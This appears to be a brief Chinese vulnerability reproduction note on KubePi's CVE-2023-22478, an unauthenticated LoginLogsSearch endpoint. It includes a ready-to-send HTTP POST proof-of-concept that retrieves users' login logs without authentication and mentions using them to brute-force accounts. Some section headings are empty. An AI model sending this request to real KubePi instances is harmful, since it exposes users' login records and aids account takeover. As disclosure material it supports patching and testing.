KubePi LoginLogsSearch 未授权访问漏洞 CVE-2023-22478
漏洞描述
KubePi LoginLogsSearch 方法下的接口存在未授权访问漏洞,攻击者通过漏洞可以未授权获取用户的登录日志信息,进一步爆破用户
漏洞影响
网络测绘
漏洞复现
登录页面
补丁中对路由加了身份验证
对应的接口为
验证POC
POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
Content-Type: application/json
{}
1
2
3
4